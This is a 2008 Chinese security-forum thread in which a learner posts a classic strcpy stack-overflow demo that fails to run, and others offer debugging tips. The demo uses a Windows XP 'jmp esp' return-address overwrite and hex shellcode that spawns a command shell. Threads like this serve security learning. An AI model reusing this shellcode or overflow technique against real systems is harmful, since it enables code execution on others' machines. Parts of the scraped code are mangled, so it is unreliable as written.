【3.A.S.T】网络安全爱好者 » 技术交流 » [讨论]问一个缓冲区溢出的问题 望高手帮帮忙

jjcd 发表于 2008-7-20 23:24

[讨论]问一个缓冲区溢出的问题 望高手帮帮忙

[讨论]问一个缓冲区溢出的问题 望高手帮帮忙
议题作者：keith_269
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

我最近想学一下缓冲区溢出的相关知识。在网上下了本书《Q版缓冲区溢出教程》，感觉写的

还不错，浅显易懂。但是在测试书上的一个例子时，没有出现应有的效果，不知道哪里出毛病

了，希望大家能帮一下忙！
就是一个很简单的利用strcpy的入门级例子。书中的例子是利用jmp esp导致溢出到一个弹出

cmd程序的shellcode。在书上说的jmp esp的地址是0x77e1af64，不过我的电脑是windows xp

sp2.我用程序查出我的jmp esp的地址是0x7c961eed。我就单单改了原来程序中的jmp esp的代

码，其他都跟书上一样（用的源码）。但是结果并没有出现溢出，没有弹出cmd程序。而是弹

出“\0x41\0x41\0x41\0x41\0x41\0x41\0x41\0x41Press any key to continue”不知道错在

哪里，望高手指教帮忙，万分感谢！

问题中没有说清楚的地方可以回帖问我！

源代码如下：
#include <stdio.h>
#include <string.h>

char name[] =
"\x41\x41\x41\x41"  //name[0]-name[3]
"\x41\x41\x41\x41"  //name[4]-name[7]
"\x41\x41\x41\x41"  //覆盖ebp
"\xed\x1e\x96\x7c" //!覆盖成jmp esp的地址，在winXP sp2上为0x7c961eed。我只是

修改了这里
//下面是cmd的shellcode。我没有修改                                
"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
"\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45

\xFA\x2E\xC6"
"\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\x54\xA2"
"\xE6\x77\x52\x8D\x45\xF4\x50"
"\xFF\x55\xF0"
"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x64\x2E"
"\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF4"
"\x50\xB8\x4a\x9b\x01\x78\xFF\xD0";


//char name[] = "abcdefgh";
//char name[] = "abcdefghijklmnopqrstuvwxyz";
int main()
{
        char output[8];
               
        strcpy(output, name);

        for(int i=0;i<8&&output;i++)

                printf("\\0x%x",output);

        return 0;
}
帖子1 精华[url=http://forum.eviloctal.com/digest.php?authorid=164030]0[/url] 积分1 阅读权限40 在线时间1 小时 注册时间2008-5-31 最后登录2008-6-2 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=164030]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=33240&repquote=143636&extra=page%3D3&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=33240&pid=143636&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]


[url=http://forum.eviloctal.com/space-uid-75365.html]yinhao[/url] [img]http://forum.eviloctal.com/images/avatars/pw/kawayi1.gif[/img]
晶莹剔透§烈日灼然

芥茉 发表于 2008-7-20 23:24

没有定位好shellcode的位置   建议对比一下你的shellcode的地址和esp的地址  
另外要确定他们是不是在同一个区段
[url=http://wpa.qq.com/msgrd?V=1&Uin=234117693&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子16 精华[url=http://forum.eviloctal.com/digest.php?authorid=75365]0[/url] 积分29 阅读权限40 性别男 在线时间6 小时 注册时间2007-1-28 最后登录2008-7-17 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=75365]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=33240&repquote=143828&extra=page%3D3&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=33240&pid=143828&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=软件外包&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]软件项目外包[/url]

[url=http://forum.eviloctal.com/space-uid-1612.html]netxfly[/url] [img]http://forum.eviloctal.com/images/avatars/pw/male1.gif[/img]
技术核心组
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level2.gif[/img]

小明 发表于 2008-7-20 23:24

我去年写过一个《堆栈溢出入门》的paper，可能对你有用。

[url=http://forum.eviloctal.com/viewthread.php?tid=28519]http://forum.eviloctal.com/viewthread.php?tid=28519[/url]
帖子303 精华[url=http://forum.eviloctal.com/digest.php?authorid=1612]12[/url] 积分4097 阅读权限200 性别男 在线时间255 小时 注册时间2005-1-20 最后登录2008-7-11 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=1612]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=33240&repquote=143875&extra=page%3D3&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=33240&pid=143875&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=干洗店加盟&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]少女暴富的隐秘（图）[/url]

[url=http://forum.eviloctal.com/space-uid-147593.html]mistakes[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

查看完整版本: [讨论]问一个缓冲区溢出的问题 望高手帮帮忙